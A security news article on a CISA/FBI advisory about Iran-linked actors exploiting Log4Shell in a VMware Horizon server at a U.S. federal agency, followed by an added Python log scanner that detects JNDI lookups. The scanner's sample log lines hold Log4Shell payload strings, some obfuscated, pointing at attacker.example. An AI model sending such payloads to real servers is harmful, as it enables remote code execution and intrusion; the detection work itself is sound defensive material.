Iran-Linked Threat Actors Compromise a U.S. Federal Civilian Network

Iran-linked threat actors exploited the Log4Shell vulnerability to breach a Federal Civilian Executive Branch organization and install cryptomining malware.

An Iran-linked APT group exploited the Log4Shell vulnerability (CVE-2021-44228) to attack a Federal Civilian Executive Branch (FCEB) organization and deploy cryptomining malware, according to a joint announcement from the FBI and CISA.

Log4Shell affects products from several major companies that use Log4j, but in many attacks the vulnerability has been exploited against affected VMware software.

In this specific case, Iranian hackers compromised an unpatched VMware Horizon server for remote code execution.

“CISA obtained four malicious files for analysis during its involvement in an on-site incident response to a Federal Civilian Executive Branch (FCEB) organization compromised by an Iranian government-sponsored Advanced Persistent Threat (APT) actor,” reads the Malware Analysis Report (AR22-320A) published by CISA. “The files have been identified as variants of the XMRIG cryptocurrency mining software. These files include a kernel driver, two Windows executables, and a configuration file that controls one of the executable’s behaviors on the network and on the infected host.”

CISA conducted incident response engagements at affected Federal Civilian Executive Branch (FCEB) organizations from mid-June to mid-July 2022.

After installing the XMRig cryptominer, the attackers moved laterally to reach domain controllers (DCs), compromise credentials, and then plant the Ngrok reverse proxy on multiple hosts for persistence in the compromised network, government experts found.

“CISA and FBI assess that the FCEB network was compromised by Iranian state-sponsored APT actors,” reads the joint advisory. “CISA and the FBI are publishing this Cybersecurity Advisory (CSA) to provide the Tactics, Techniques, and Procedures (TTPs) and Indicators of Compromise (IOCs) of suspected Iranian government-sponsored actors to help cyber defenders detect and prevent related compromises.”

CISA and the FBI encourage all organizations running vulnerable VMware servers to assume compromise and launch threat hunting activities.

The joint advisory urges organizations that suspect initial access or compromise to assume lateral movement by the threat actor, investigate connected systems (including DCs), and audit privileged accounts. The bulletin also includes recommendations to prevent similar malicious cyber activity.
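A starting point for the threat hunting the advisory calls for, added here as an example and not part of CISA's or the FBI's guidance: a small Python scanner that URL-decodes access-log lines, peels the nested Log4j lookup wrappers commonly used to hide the literal `${jndi` string, and flags any line carrying a JNDI lookup. The log lines and the host `attacker.example` are constructed for the example.

```python
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Wrappers used to hide the literal "${jndi" from naive matching; peeled innermost
# first: ${lower:j}/${upper:j} -> j, and ${env:NOPE:-j}/${::-j} (":-" default) -> j.
_CASE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}:]*:[^${}]*?:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE)

def normalize(text: str) -> str:
    """URL-decode, then strip nested lookup wrappers until nothing changes."""
    s = unquote(text)
    for _ in range(10):  # bounded so hostile input cannot spin forever
        unwrapped = _DEFAULT.sub(r"\1", _CASE.sub(r"\1", s))
        if unwrapped == s:
            return s
        s = unwrapped
    return s

@dataclass(frozen=True)
class Finding:
    line_no: int   # 1-based index into the scanned log
    scheme: str    # JNDI provider requested (ldap, rmi, ...)
    evidence: str  # normalized lookup string, for the analyst

def scan(lines):
    """Return one Finding per log line carrying a JNDI lookup in any field."""
    findings = []
    for no, raw in enumerate(lines, 1):
        norm = normalize(raw)
        m = _JNDI.search(norm)
        if m:
            end = norm.find("}", m.end())  # -1 (no closing brace) falls back to line end
            findings.append(Finding(no, m.group(1).lower(), norm[m.start():end + 1 or None]))
    return findings

# Constructed access-log lines (placeholder host attacker.example), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Nov/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [17/Nov/2022:10:01:04 +0000] "GET /docs/jndi-lookup.html HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [17/Nov/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example:1389/a}"',
    '10.0.0.9 - - [17/Nov/2022:10:01:09 +0000] "GET /portal/?q=%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A%2F%2Fattacker.example%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [17/Nov/2022:10:01:11 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:${::-l}dap://attacker.example/c}"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: jndi/{f.scheme} lookup -> {f.evidence}")
```

The benign line that merely mentions "jndi" in a path is not flagged, while the URL-encoded and wrapper-obfuscated lookups are; a hit is a starting point for the lateral-movement investigation described above, not proof of successful exploitation.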

CISA and FBI recommend:

  • Install updated builds to ensure affected VMware Horizon and UAG systems are running the latest version.
  • Keep all software up to date and prioritize patching of Known Exploited Vulnerabilities (KEVs).
  • Minimize the internet-facing attack surface.
  • Follow best practices for Identity and Access Management (IAM).
  • Audit domain controllers.
  • Create a deny list of known compromised credentials.
  • Protect credentials by limiting where accounts and credentials can be used.

In June, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Coast Guard Cyber Command (CGCYBER) issued a joint advisory warning that hackers were attempting to exploit the Log4Shell vulnerability in VMware Horizon servers to compromise targeted networks.

“CISA and the U.S. Coast Guard Cyber Command (CGCYBER) issued a joint cybersecurity advisory (CSA) to warn cyber defenders that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, continue to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon® and Unified Access Gateway (UAG) servers to gain initial access to organizations that have not applied available patches,” reads the advisory.

The CVE-2021-44228 vulnerability made headlines in December after Chinese security researcher p0rz9 publicly disclosed a proof-of-concept exploit for a critical remote code execution zero-day vulnerability (aka Log4Shell) affecting the Apache Log4j Java-based logging library.

In one attack documented by government experts, the threat actor was able to move laterally inside the network and collect and exfiltrate sensitive data.


Pierluigi Paganini

(SecurityAffairs – hacking, Iran)
